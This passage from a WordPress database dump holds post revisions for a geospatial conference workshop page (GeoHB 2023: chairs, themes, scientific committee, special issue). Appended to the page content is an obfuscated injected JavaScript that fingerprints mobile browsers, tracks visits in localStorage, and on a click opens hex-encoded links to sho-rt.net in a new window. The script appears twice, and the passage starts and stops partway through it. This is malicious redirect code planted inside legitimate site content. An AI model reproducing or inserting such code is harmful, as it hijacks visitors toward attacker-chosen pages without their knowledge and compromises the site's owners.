os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Semantics3D - Semantic Scene Analysis and 3D Reconstruction from Images and Image Sequences','','inherit','closed','closed','','2795-revision-v1','','','2023-02-05 14:09:59','2023-02-05 14:09:59','',2795,'https://gsw2023.com/?p=3822',0,'revision','',0);
INSERT INTO `dnctiavkr_posts` VALUES
(3823,1,'2023-02-05 14:10:34','2023-02-05 14:10:34','[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2816\" img_size=\"600x600\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]\r\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\">GeoHB 2023: Geo-Spatial Computing for Understanding Human Behaviours</span></strong></h5>\r\n&nbsp;\r\n<h5 style=\"text-align: justify; color: black;\"><strong>Urban spaces have become complex, being shaped by diverse human behaviours. Therefore, the sustainability of development has faced various challenges ranging from pollution to equity in accessibility to activity spaces and opportunities. Using spatial big data and new computing technologies is an effective way to a better understanding of the interaction between individuals and urban environments, which would be beneficial to tackle urban challenges. This workshop focuses on new advanced technologies on spatial data representation and interoperability, geo-computation and -simulation, and GeoAI, which can harness human behaviour related spatial big data, discovering the mechanisms of the interaction between human behaviours and urban environments.</strong></h5>\r\n[/vc_column_text][vc_separator color=\"pink\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\r\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_max_width=\"120px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"49\"][vc_row_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"3/4\"][vc_column_text]\r\n<h5></h5>\r\n<h5><strong>Themes of event:</strong></h5>\r\n<ul>\r\n 	<li>Geo-computation and geo-simulation models for understanding human mobility patterns and underlying mechanisms of the interactions between human behaviours and urban environments</li>\r\n 	<li>Computational time geographical methods for modelling and representing human activity-travel behaviour</li>\r\n 	<li>Spatio-temporal data mining methods for uncovering human behaviour and its interactions with urban environments</li>\r\n 	<li>Knowledge-based geo-computation for reasoning human behaviour contexts</li>\r\n 	<li>GeoAI-based technique for sensing urban environments using spatio-temporal big data</li>\r\n 	<li>Computational methods for analysing individual and collective behaviour uncertainties within complex systems</li>\r\n 	<li>Reliability-based measures for quantifying accessibility under behavioural and environmental uncertainties</li>\r\n 	<li>Reliable geo-computation methods for optimizing activity-travel scheduling under uncertainties</li>\r\n 	<li>Conceptual models for human behaviour related spatial data representation and associated data such as time series.</li>\r\n 	<li>Use case of international standards to foster scalability and reusability of solutions for human mobility big data.</li>\r\n 	<li>New solutions for effective and meaningful spatial data integration for human activity pattern study</li>\r\n 	<li>Geo-visualization and spatial representation methods of spatio-temporal big data on human mobility</li>\r\n 	<li>New developments of strategies and automated computational approaches for handling geo-privacy and ethical issues involved in the analysis of and use of individuals’ spatial data</li>\r\n</ul>\r\n<h5></h5>\r\n<h5></h5>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h5><strong>Scientific Committee:</strong></h5>\r\n<ul>\r\n 	<li>Pawel Boguslawski, Wroclaw University of Environmental and Life Sciences, Poland</li>\r\n 	<li>Elisabetta Colucci, Politecnico di Torino, Italy</li>\r\n 	<li>Chen-Chieh Feng, National University of Singapore, Singapore</li>\r\n 	<li>Rui Zhu, Agency for Science, Technology and Research, Singapore</li>\r\n 	<li>James Haworth, University College London, UK</li>\r\n 	<li>Tao Jia, Wuhan University, China</li>\r\n 	<li>Xiao Li, University of Oxford, UK</li>\r\n 	<li>Chun Liu, Tongji University, China</li>\r\n 	<li>Xintao Liu, The Hong Kong Polytechnic University, China</li>\r\n 	<li>Francesca Noardo, Open Geospatial Consortium</li>\r\n 	<li>Azarakhsh Rafiee-Voermans, Delft University of Technology, Netherlands</li>\r\n 	<li>PWitold Rohm, Wroclaw University of Environmental and Life Sciences, Poland</li>\r\n 	<li>Shih-Lung Shaw, University of Tennessee, Knoxville, USA</li>\r\n 	<li>Katarzyna Sila-Nowicka, University of Auckland, New Zealand</li>\r\n 	<li>Noam Shoval, Hebrew University of Jerusalem, Israel</li>\r\n 	<li>Donggen Wang, The Hong Kong Baptist University, China</li>\r\n 	<li>Martin Werner, Technical University of Munich, Germany</li>\r\n 	<li>René Westerholt, Technical University of Dortmund, Germany</li>\r\n 	<li>Hangbin Wu, Tongji University, China</li>\r\n 	<li>Marco Minghini, European Commission - Joint Research Centre (JRC), Italy</li>\r\n</ul>\r\n<h5></h5>\r\n<h5></h5>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h5><strong>Supporting ISPRS Working Groups:</strong></h5>\r\n<ul>\r\n 	<li>WG IV/1: Spatial data representation and interoperability</li>\r\n 	<li>WG IV/3: Geo-computation and geo-simulation</li>\r\n 	<li>ICWG IV/III/II: Openness in Geospatial Science and Remote Sensing</li>\r\n 	<li>WG IV/6: Human Behaviour and Spatial Interactions</li>\r\n</ul>\r\n&nbsp;\r\n<h5></h5>\r\n<h5></h5>\r\n<h5><strong>Special Issue for the workshop:</strong></h5>\r\nThe authors of selected papers in the workshop will be invited to submit an extended full paper to the Transactions in GIS (<a href=\"https://onlinelibrary.wiley.com/journal/14679671\">https://onlinelibrary.wiley.com/journal/14679671</a>; current impact factor: 2.568). The selected papers will go through the peer-review process of the journal.[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GeoHB 2023: Geo-Spatial Computing for Understanding Human Behaviours','','inherit','closed','closed','','2791-revision-v1','','','2023-02-05 14:10:34','2023-02-05 14:10:34','',2791,'https://gsw2023.com/?p=3823',0,'revision','',0),
(3824,1,'2023-02-05 14:10:59','2023-02-05 14:10:59','[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2816\" img_size=\"600x600\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\">GeoHB 2023: Geo-Spatial Computing for Understanding Human Behaviours</span></strong></h5>\n&nbsp;\n<h5 style=\"text-align: justify; color: black;\"><strong>Urban spaces have become complex, being shaped by diverse human behaviours. Therefore, the sustainability of development has faced various challenges ranging from pollution to equity in accessibility to activity spaces and opportunities. Using spatial big data and new computing technologies is an effective way to a better understanding of the interaction between individuals and urban environments, which would be beneficial to tackle urban challenges. This workshop focuses on new advanced technologies on spatial data representation and interoperability, geo-computation and -simulation, and GeoAI, which can harness human behaviour related spatial big data, discovering the mechanisms of the interaction between human behaviours and urban environments.</strong></h5>\n[/vc_column_text][vc_separator color=\"pink\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_max_width=\"120px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"49\"][vc_row_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"3/4\"][vc_column_text]\n<h5></h5>\n<h5><strong>Themes of event:</strong></h5>\n<ul>\n 	<li>Geo-computation and geo-simulation models for understanding human mobility patterns and underlying mechanisms of the interactions between human behaviours and urban environments</li>\n 	<li>Computational time geographical methods for modelling and representing human activity-travel behaviour</li>\n 	<li>Spatio-temporal data mining methods for uncovering human behaviour and its interactions with urban environments</li>\n 	<li>Knowledge-based geo-computation for reasoning human behaviour contexts</li>\n 	<li>GeoAI-based technique for sensing urban environments using spatio-temporal big data</li>\n 	<li>Computational methods for analysing individual and collective behaviour uncertainties within complex systems</li>\n 	<li>Reliability-based measures for quantifying accessibility under behavioural and environmental uncertainties</li>\n 	<li>Reliable geo-computation methods for optimizing activity-travel scheduling under uncertainties</li>\n 	<li>Conceptual models for human behaviour related spatial data representation and associated data such as time series.</li>\n 	<li>Use case of international standards to foster scalability and reusability of solutions for human mobility big data.</li>\n 	<li>New solutions for effective and meaningful spatial data integration for human activity pattern study</li>\n 	<li>Geo-visualization and spatial representation methods of spatio-temporal big data on human mobility</li>\n 	<li>New developments of strategies and automated computational approaches for handling geo-privacy and ethical issues involved in the analysis of and use of individuals’ spatial data</li>\n</ul>\n<h5></h5>\n<h5></h5>\n&nbsp;\n\n&nbsp;\n<h5><strong>Scientific Committee:</strong></h5>\n<ul>\n 	<li>Pawel Boguslawski, Wroclaw University of Environmental and Life Sciences, Poland</li>\n 	<li>Elisabetta Colucci, Politecnico di Torino, Italy</li>\n 	<li>Chen-Chieh Feng, National University of Singapore, Singapore</li>\n 	<li>Rui Zhu, Agency for Science, Technology and Research, Singapore</li>\n 	<li>James Haworth, University College London, UK</li>\n 	<li>Tao Jia, Wuhan University, China</li>\n 	<li>Xiao Li, University of Oxford, UK</li>\n 	<li>Chun Liu, Tongji University, China</li>\n 	<li>Xintao Liu, The Hong Kong Polytechnic University, China</li>\n 	<li>Francesca Noardo, Open Geospatial Consortium</li>\n 	<li>Azarakhsh Rafiee-Voermans, Delft University of Technology, Netherlands</li>\n 	<li>PWitold Rohm, Wroclaw University of Environmental and Life Sciences, Poland</li>\n 	<li>Shih-Lung Shaw, University of Tennessee, Knoxville, USA</li>\n 	<li>Katarzyna Sila-Nowicka, University of Auckland, New Zealand</li>\n 	<li>Noam Shoval, Hebrew University of Jerusalem, Israel</li>\n 	<li>Donggen Wang, The Hong Kong Baptist University, China</li>\n 	<li>Martin Werner, Technical University of Munich, Germany</li>\n 	<li>René Westerholt, Technical University of Dortmund, Germany</li>\n 	<li>Hangbin Wu, Tongji University, China</li>\n 	<li>Marco Minghini, European Commission - Joint Research Centre (JRC), Italy</li>\n</ul>\n<h5></h5>\n<h5></h5>\n&nbsp;\n\n&nbsp;\n<h5><strong>Supporting ISPRS Working Groups:</strong></h5>\n<ul>\n 	<li>WG IV/1: Spatial data representation and interoperability</li>\n 	<li>WG IV/3: Geo-computation and geo-simulation</li>\n 	<li>ICWG IV/III/II: Openness in Geospatial Science and Remote Sensing</li>\n 	<li>WG IV/6: Human Behaviour and Spatial Interactions</li>\n</ul>\n&nbsp;\n<h5></h5>\n<h5></h5>\n<h5><strong>Special Issue for the workshop:</strong></h5>\nThe authors of selected papers in the workshop will be invited to submit an extended full paper to the Transactions in GIS (<a href=\"https://onlinelibrary.wiley.com/journal/14679671\">https://onlinelibrary.wiley.com/journal/14679671</a>; current impact factor: 2.568). The selected papers will go through the peer-review process of the journal.[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return 